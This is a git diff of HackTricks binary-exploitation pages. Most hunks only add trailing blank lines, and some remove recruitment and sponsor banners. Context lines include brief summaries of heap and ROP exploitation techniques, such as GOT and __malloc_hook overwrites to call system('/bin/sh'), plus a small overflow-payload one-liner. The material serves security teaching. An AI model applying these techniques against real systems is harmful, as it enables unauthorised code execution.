diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.md b/src/binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.md
index 43980bbca..39ca23244 100644
--- a/src/binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.md
+++ b/src/binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.md
@@ -82,3 +82,5 @@ When a **mismatch is detected** the kernel will **panic** to prevent further exp
 - [https://www.youtube.com/watch?v=UwMt0e_dC_Q](https://www.youtube.com/watch?v=UwMt0e_dC_Q)
 {{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/no-exec-nx.md b/src/binary-exploitation/common-binary-protections-and-bypasses/no-exec-nx.md
index 376dfe6c4..5e8bacf3e 100644
--- a/src/binary-exploitation/common-binary-protections-and-bypasses/no-exec-nx.md
+++ b/src/binary-exploitation/common-binary-protections-and-bypasses/no-exec-nx.md
@@ -14,3 +14,5 @@ The **No-Execute (NX)** bit, also known as **Execute Disable (XD)** in Intel ter
 - **Ret2...**
 {{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md b/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md
index 99a33743d..b92435899 100644
--- a/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md
+++ b/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md
@@ -30,3 +30,5 @@ bypassing-canary-and-pie.md - [https://ir0nstone.gitbook.io/notes/types/stack/pie](https://ir0nstone.gitbook.io/notes/types/stack/pie) {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md b/src/binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md index 996facccb..d0049d024 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md @@ -94,3 +94,5 @@ According to [**some observation from this post**](https://github.com/florianhof According to that blog post it's recommended to add a short delay between requests to the server is introduced. {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/relro.md b/src/binary-exploitation/common-binary-protections-and-bypasses/relro.md index 59b406c5e..66d2ead05 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/relro.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/relro.md @@ -33,3 +33,5 @@ If Full RELRO is enabled, the only way to bypass it is to find another way that Note that **LIBC's GOT is usually Partial RELRO**, so it can be modified with an arbitrary write. More information in [Targetting libc GOT entries](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#1---targetting-libc-got-entries)**.** {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/README.md b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/README.md index 5c1044b98..466cf3db5 100644 
--- a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/README.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/README.md @@ -74,3 +74,5 @@ This attack is performed in the writeup: [https://7rocky.github.io/en/ctf/other/ - [https://7rocky.github.io/en/ctf/other/securinets-ctf/scrambler/](https://7rocky.github.io/en/ctf/other/securinets-ctf/scrambler/) {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md index 89eee29ec..8bc7f50f3 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md @@ -119,3 +119,5 @@ Check also the presentation of [https://www.slideshare.net/codeblue_jp/master-ca - [https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html](https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html) - 64 bits, no PIE, nx, BF canary, write in some memory a ROP to call `execve` and jump there. + + diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md index e4d3eed44..0a455a595 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md 
@@ -31,3 +31,5 @@ With an **arbitrary read** like the one provided by format **strings** it might - This challenge abuses in a very simple way a format string to read the canary from the stack {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/common-exploiting-problems.md b/src/binary-exploitation/common-exploiting-problems.md index 1aaf06372..662aac265 100644 --- a/src/binary-exploitation/common-exploiting-problems.md +++ b/src/binary-exploitation/common-exploiting-problems.md @@ -36,3 +36,5 @@ In order to bypass this the **escape character `\x16` must be prepended to any ` **Here you can** [**find an example of this behaviour**](https://ir0nstone.gitbook.io/hackthebox/challenges/pwn/dream-diary-chapter-1/unlink-exploit)**.** {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/format-strings/README.md b/src/binary-exploitation/format-strings/README.md index 3d7bfa018..b687806c2 100644 --- a/src/binary-exploitation/format-strings/README.md +++ b/src/binary-exploitation/format-strings/README.md @@ -2,11 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -
- -If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). - -{% embed url="https://www.stmcyber.com/careers" %} ## Basic Information @@ -242,10 +237,7 @@ It's possible to abuse the write actions of a format string vulnerability to **w - [https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html](https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html) - 32 bit, relro, no canary, nx, no pie, format string to write an address inside main in `.fini_array` (so the flow loops back 1 more time) and write the address to `system` in the GOT table pointing to `strlen`. When the flow goes back to main, `strlen` is executed with user input and pointing to `system`, it will execute the passed commands. -
- -If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). - -{% embed url="https://www.stmcyber.com/careers" %} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md b/src/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md index 0665b14a1..c8b15a038 100644 --- a/src/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md +++ b/src/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md @@ -182,3 +182,5 @@ p.close()
{{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/format-strings/format-strings-template.md b/src/binary-exploitation/format-strings/format-strings-template.md index 71e1d4624..95e2f1e80 100644 --- a/src/binary-exploitation/format-strings/format-strings-template.md +++ b/src/binary-exploitation/format-strings/format-strings-template.md @@ -143,3 +143,5 @@ P.interactive() ``` {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/integer-overflow.md b/src/binary-exploitation/integer-overflow.md index cf1a6ca4f..e33badf8f 100644 --- a/src/binary-exploitation/integer-overflow.md +++ b/src/binary-exploitation/integer-overflow.md @@ -121,3 +121,5 @@ In this example, if a user inputs a negative number, it will be interpreted as a This **doesn't change in ARM64** as you can see in [**this blog post**](https://8ksec.io/arm64-reversing-and-exploitation-part-8-exploiting-an-integer-overflow-vulnerability/). {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/ios-exploiting.md b/src/binary-exploitation/ios-exploiting.md index dbf5dc009..77f327780 100644 --- a/src/binary-exploitation/ios-exploiting.md +++ b/src/binary-exploitation/ios-exploiting.md @@ -210,3 +210,5 @@ void iosurface_kwrite64(uint64_t addr, uint64_t value) { With these primitives, the exploit provides controlled **32-bit reads** and **64-bit writes** to kernel memory. Further jailbreak steps could involve more stable read/write primitives, which may require bypassing additional protections (e.g., PPL on newer arm64e devices). + + diff --git a/src/binary-exploitation/libc-heap/README.md b/src/binary-exploitation/libc-heap/README.md index 319126fe0..2e8fdc012 100644 --- a/src/binary-exploitation/libc-heap/README.md +++ b/src/binary-exploitation/libc-heap/README.md 
@@ -527,3 +527,5 @@ heap-memory-functions/heap-functions-security-checks.md - [https://azeria-labs.com/heap-exploitation-part-1-understanding-the-glibc-heap-implementation/](https://azeria-labs.com/heap-exploitation-part-1-understanding-the-glibc-heap-implementation/) - [https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/](https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/) + + diff --git a/src/binary-exploitation/libc-heap/bins-and-memory-allocations.md b/src/binary-exploitation/libc-heap/bins-and-memory-allocations.md index eb184fc93..b39f0f605 100644 --- a/src/binary-exploitation/libc-heap/bins-and-memory-allocations.md +++ b/src/binary-exploitation/libc-heap/bins-and-memory-allocations.md @@ -638,3 +638,5 @@ heap-memory-functions/heap-functions-security-checks.md - [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/implementation/tcache/](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/implementation/tcache/) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/double-free.md b/src/binary-exploitation/libc-heap/double-free.md index a30116d58..e6826e65f 100644 --- a/src/binary-exploitation/libc-heap/double-free.md +++ b/src/binary-exploitation/libc-heap/double-free.md @@ -130,3 +130,5 @@ h1: 0xaaab0f0c2380 - [https://heap-exploitation.dhavalkapil.com/attacks/double_free](https://heap-exploitation.dhavalkapil.com/attacks/double_free) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/fast-bin-attack.md b/src/binary-exploitation/libc-heap/fast-bin-attack.md index c36c675de..9ddcde54d 100644 --- a/src/binary-exploitation/libc-heap/fast-bin-attack.md +++ b/src/binary-exploitation/libc-heap/fast-bin-attack.md @@ -151,3 +151,5 @@ unsorted-bin-attack.md {{#endref}} {{#include ../../banners/hacktricks-training.md}} + + 
diff --git a/src/binary-exploitation/libc-heap/heap-memory-functions/README.md b/src/binary-exploitation/libc-heap/heap-memory-functions/README.md index 04855d5fb..24d8c3dbb 100644 --- a/src/binary-exploitation/libc-heap/heap-memory-functions/README.md +++ b/src/binary-exploitation/libc-heap/heap-memory-functions/README.md @@ -5,3 +5,5 @@ ## {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/heap-memory-functions/free.md b/src/binary-exploitation/libc-heap/heap-memory-functions/free.md index e57b1fa77..c9b6fa11a 100644 --- a/src/binary-exploitation/libc-heap/heap-memory-functions/free.md +++ b/src/binary-exploitation/libc-heap/heap-memory-functions/free.md @@ -384,3 +384,5 @@ _int_free_merge_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T size) {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md b/src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md index 18a0a02b7..60d5e2019 100644 --- a/src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md +++ b/src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md @@ -161,3 +161,5 @@ free.md - Error message: `realloc(): invalid next size` {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.md b/src/binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.md index 3b2ab7085..0199e5b87 100644 --- a/src/binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.md +++ b/src/binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.md @@ -1744,3 +1744,5 @@ sysmalloc_mmap (INTERNAL_SIZE_T nb, size_t pagesize, int extra_flags, mstate av) {{#include ../../../banners/hacktricks-training.md}} + + 
diff --git a/src/binary-exploitation/libc-heap/heap-memory-functions/unlink.md b/src/binary-exploitation/libc-heap/heap-memory-functions/unlink.md index 7d26f6546..c27847032 100644 --- a/src/binary-exploitation/libc-heap/heap-memory-functions/unlink.md +++ b/src/binary-exploitation/libc-heap/heap-memory-functions/unlink.md @@ -81,3 +81,5 @@ Heap leaks: - If P is in the doubly linked list, both `fd` and `bk` will be pointing to an available chunk in the heap {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/heap-overflow.md b/src/binary-exploitation/libc-heap/heap-overflow.md index 24ea86a70..17e6e72f0 100644 --- a/src/binary-exploitation/libc-heap/heap-overflow.md +++ b/src/binary-exploitation/libc-heap/heap-overflow.md @@ -48,3 +48,5 @@ python3 -c 'print("/"*0x400+"/bin/ls\x00")' > hax.txt - We corrupt pointers to a function inside a `struct` of the overflowed chunk to set a function such as `system` and get code execution. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/house-of-einherjar.md b/src/binary-exploitation/libc-heap/house-of-einherjar.md index 28c6fd437..11b2c1b9e 100644 --- a/src/binary-exploitation/libc-heap/house-of-einherjar.md +++ b/src/binary-exploitation/libc-heap/house-of-einherjar.md @@ -47,3 +47,5 @@ - Use House of Einherjar to get an overlapping chunks situation and finish with Tcache poisoning ti get an arbitrary write primitive. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/house-of-force.md b/src/binary-exploitation/libc-heap/house-of-force.md index 7d4fb9247..57ba9fee6 100644 --- a/src/binary-exploitation/libc-heap/house-of-force.md +++ b/src/binary-exploitation/libc-heap/house-of-force.md 
@@ -62,3 +62,5 @@ Then, do another malloc to get a chunk at the target address. - Then, House of force was used (abusing the UAF) to overwrite the size of the left space with a -1, allocate a chunk big enough to get tot he free hook, and then allocate another chunk which will contain the free hook. Then, write in the hook the address of `system`, write in a chunk `"/bin/sh"` and finally free the chunk with that string content. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/house-of-lore.md b/src/binary-exploitation/libc-heap/house-of-lore.md index 862ba7323..58fa1f554 100644 --- a/src/binary-exploitation/libc-heap/house-of-lore.md +++ b/src/binary-exploitation/libc-heap/house-of-lore.md @@ -45,3 +45,5 @@ Then you will be able to allocate `fake0`. - [https://guyinatuxedo.github.io/40-house_of_lore/house_lore_exp/index.html](https://guyinatuxedo.github.io/40-house_of_lore/house_lore_exp/index.html) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/house-of-orange.md b/src/binary-exploitation/libc-heap/house-of-orange.md index e57f477c6..42ace40b5 100644 --- a/src/binary-exploitation/libc-heap/house-of-orange.md +++ b/src/binary-exploitation/libc-heap/house-of-orange.md @@ -73,3 +73,5 @@ This approach exploits heap management mechanisms, libc information leaks, and h - [https://guyinatuxedo.github.io/43-house_of_orange/house_orange_exp/index.html](https://guyinatuxedo.github.io/43-house_of_orange/house_orange_exp/index.html) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/house-of-rabbit.md b/src/binary-exploitation/libc-heap/house-of-rabbit.md index 230b7c63e..ad794d63f 100644 --- a/src/binary-exploitation/libc-heap/house-of-rabbit.md +++ b/src/binary-exploitation/libc-heap/house-of-rabbit.md 
@@ -109,3 +109,5 @@ The fake chunk becomes part of the fastbin list, making it a legitimate chunk fo The **House of Rabbit** technique involves either modifying the size of a fast bin chunk to create overlapping chunks or manipulating the `fd` pointer to create fake chunks. This allows attackers to forge legitimate chunks in the heap, enabling various forms of exploitation. Understanding and practicing these steps will enhance your heap exploitation skills. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/house-of-roman.md b/src/binary-exploitation/libc-heap/house-of-roman.md index a3deaf939..b57aab2c2 100644 --- a/src/binary-exploitation/libc-heap/house-of-roman.md +++ b/src/binary-exploitation/libc-heap/house-of-roman.md @@ -116,3 +116,5 @@ Finally, one the correct address is overwritten, **call `malloc` and trigger the - [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_roman/](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_roman/) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/house-of-spirit.md b/src/binary-exploitation/libc-heap/house-of-spirit.md index 1ce36fd14..522f24b9d 100644 --- a/src/binary-exploitation/libc-heap/house-of-spirit.md +++ b/src/binary-exploitation/libc-heap/house-of-spirit.md @@ -116,3 +116,5 @@ int main() { - [https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit](https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/large-bin-attack.md b/src/binary-exploitation/libc-heap/large-bin-attack.md index fb8a721c9..7e12332f9 100644 --- a/src/binary-exploitation/libc-heap/large-bin-attack.md +++ b/src/binary-exploitation/libc-heap/large-bin-attack.md 
@@ -56,3 +56,5 @@ You can find another great explanation of this attack in [**guyinatuxedo**](http - FSOP is needed to finish the exploit. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/off-by-one-overflow.md b/src/binary-exploitation/libc-heap/off-by-one-overflow.md index 000044db5..d344fc0f6 100644 --- a/src/binary-exploitation/libc-heap/off-by-one-overflow.md +++ b/src/binary-exploitation/libc-heap/off-by-one-overflow.md @@ -113,3 +113,5 @@ This image explains perfectly the attack: - Finally, a new fast bin chunk of 0x68 is allocated and `__malloc_hook` is overwritten with a `one_gadget` address {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/overwriting-a-freed-chunk.md b/src/binary-exploitation/libc-heap/overwriting-a-freed-chunk.md index 117f462b6..bae6b6aec 100644 --- a/src/binary-exploitation/libc-heap/overwriting-a-freed-chunk.md +++ b/src/binary-exploitation/libc-heap/overwriting-a-freed-chunk.md @@ -21,3 +21,5 @@ It might be possible to **overflow an allocated chunk having next a freed chunk* In this case it would be possible to **modify the size** of the following chunk in memory. An attacker could abuse this to **make an allocated chunk have a bigger size**, then **`free`** it, making the chunk been **added to a bin of a different** size (bigger), then allocate the **fake size**, and the attack will have access to a **chunk with a size which is bigger** than it really is, **granting therefore an overlapping chunks situation**, which is exploitable the same way to a **heap overflow** (check previous section). {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/tcache-bin-attack.md b/src/binary-exploitation/libc-heap/tcache-bin-attack.md index 7c69db95c..178f14589 100644 --- a/src/binary-exploitation/libc-heap/tcache-bin-attack.md +++ b/src/binary-exploitation/libc-heap/tcache-bin-attack.md 
@@ -45,3 +45,5 @@ Usually it's possible to find at the beginning of the heap a chunk containing th - **Tcache poisoning** to get an arbitrary write primitive. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/unlink-attack.md b/src/binary-exploitation/libc-heap/unlink-attack.md index 959ff36db..1a665428e 100644 --- a/src/binary-exploitation/libc-heap/unlink-attack.md +++ b/src/binary-exploitation/libc-heap/unlink-attack.md @@ -127,3 +127,5 @@ This attack allows to **change a pointer to a chunk to point 3 addresses before - There is an overflow that allows to control the FD and BK pointers of custom malloc that will be (custom) freed. Moreover, the heap has the exec bit, so it's possible to leak a heap address and point a function from the GOT to a heap chunk with a shellcode to execute. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/unsorted-bin-attack.md b/src/binary-exploitation/libc-heap/unsorted-bin-attack.md index 65d509c48..89e3f968b 100644 --- a/src/binary-exploitation/libc-heap/unsorted-bin-attack.md +++ b/src/binary-exploitation/libc-heap/unsorted-bin-attack.md @@ -71,3 +71,5 @@ Then C was deallocated, and consolidated with A+B (but B was still in used). A n - Fast Bin attack to modify the a global array of chunks. This gives an arbitrary read/write primitive, which allows to modify the GOT and set some function to point to `system`. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/use-after-free/README.md b/src/binary-exploitation/libc-heap/use-after-free/README.md index d6fd34f42..069a673d7 100644 --- a/src/binary-exploitation/libc-heap/use-after-free/README.md +++ b/src/binary-exploitation/libc-heap/use-after-free/README.md @@ -18,3 +18,5 @@ first-fit.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} + + 
diff --git a/src/binary-exploitation/libc-heap/use-after-free/first-fit.md b/src/binary-exploitation/libc-heap/use-after-free/first-fit.md index 7bab07aea..115d3e19b 100644 --- a/src/binary-exploitation/libc-heap/use-after-free/first-fit.md +++ b/src/binary-exploitation/libc-heap/use-after-free/first-fit.md @@ -62,3 +62,5 @@ d = malloc(20); // a - It's possible to alloc some memory, write the desired value, free it, realloc it and as the previous data is still there, it will treated according the new expected struct in the chunk making possible to set the value ot get the flag. - [**https://guyinatuxedo.github.io/26-heap_grooming/swamp19_heapgolf/index.html**](https://guyinatuxedo.github.io/26-heap_grooming/swamp19_heapgolf/index.html) - In this case it's needed to write 4 inside an specific chunk which is the first one being allocated (even after force freeing all of them). On each new allocated chunk it's number in the array index is stored. Then, allocate 4 chunks (+ the initialy allocated), the last one will have 4 inside of it, free them and force the reallocation of the first one, which will use the last chunk freed which is the one with 4 inside of it. + + diff --git a/src/binary-exploitation/rop-return-oriented-programing/README.md b/src/binary-exploitation/rop-return-oriented-programing/README.md index 29e21bca5..82d3cf9c6 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/README.md @@ -193,3 +193,5 @@ rop-syscall-execv/ - arm64, no ASLR, ROP gadget to make stack executable and jump to shellcode in stack {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md b/src/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md index 94d93bd6f..ff67ec4bf 100644 
--- a/src/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md +++ b/src/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md @@ -122,3 +122,5 @@ Behaviour signatures to find those functions: - [https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/blind-return-oriented-programming-brop](https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/blind-return-oriented-programming-brop) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md b/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md index 73cbb4e58..f16f67516 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md @@ -182,3 +182,5 @@ target.interactive() Usually these cases are also vulnerable to [**ret2plt**](../common-binary-protections-and-bypasses/aslr/ret2plt.md) + [**ret2lib**](ret2lib/), but sometimes you need to control more parameters than are easily controlled with the gadgets you find directly in libc. For example, the `write()` function requires three parameters, and **finding gadgets to set all these directly might not be possible**. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md b/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md index 1fc2ea86a..b3a3c1ab8 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md 
@@ -195,3 +195,5 @@ target.interactive() - 32bit, no relro, no canary, nx, no pie, basic small buffer overflow and return. To exploit it the bof is used to call `read` again with a `.bss` section and a bigger size, to store in there the `dlresolve` fake tables to load `system`, return to main and re-abuse the initial bof to call dlresolve and then `system('/bin/sh')`. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md b/src/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md index 868f6ffa5..7837a1283 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md @@ -187,3 +187,5 @@ p.interactive() - [https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp](https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md index c213407d3..755c3cfd8 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md @@ -163,3 +163,5 @@ This basically means abusing a **Ret2lib to transform it into a `printf` format - 32 bit, no relro, no canary, nx, pie. Abuse a bad indexing to leak addresses of libc and heap from the stack. Abuse the buffer overflow o do a ret2lib calling `system('/bin/sh')` (the heap address is needed to bypass a check). {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md index 5b24ece5f..58dce3570 100644 
--- a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md @@ -35,3 +35,5 @@ angry_gadget.py examples/libc6_2.23-0ubuntu10_amd64.so ``` {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md index a9cfca917..a45f91052 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md @@ -215,3 +215,5 @@ p.interactive() ``` {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md index fb453a1ba..36a43d76e 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md @@ -302,3 +302,5 @@ BINSH = next(libc.search("/bin/sh")) - 64 ``` {{#include ../../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md index def2864f4..e30884959 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md 
@@ -2,9 +2,6 @@ {{#include ../../../../banners/hacktricks-training.md}} -
- -{% embed url="https://websec.nl/" %} ```python:template.py from pwn import ELF, process, ROP, remote, ssh, gdb, cyclic, cyclic_find, log, p64, u64 # Import pwntools @@ -222,8 +219,7 @@ Try to **subtract 64 bytes to the address of "/bin/sh"**: BINSH = next(libc.search("/bin/sh")) - 64 ``` -
- -{% embed url="https://websec.nl/" %} {{#include ../../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md b/src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md index a3a6c9ed5..76002a8f0 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md @@ -67,3 +67,5 @@ srop-sigreturn-oriented-programming/srop-arm64.md {{#endref}} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md index 444927dfd..19e1ce68b 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md @@ -193,3 +193,5 @@ target.interactive() - 64 bits, no PIE, nx, BF canary, write in some memory a ROP to call `execve` and jump there. {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md index 5b912eab8..abcc529f9 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md +++ b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md @@ -126,3 +126,5 @@ p.interactive() ``` {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md index 20e07f3f2..06cfe6a0d 100644 
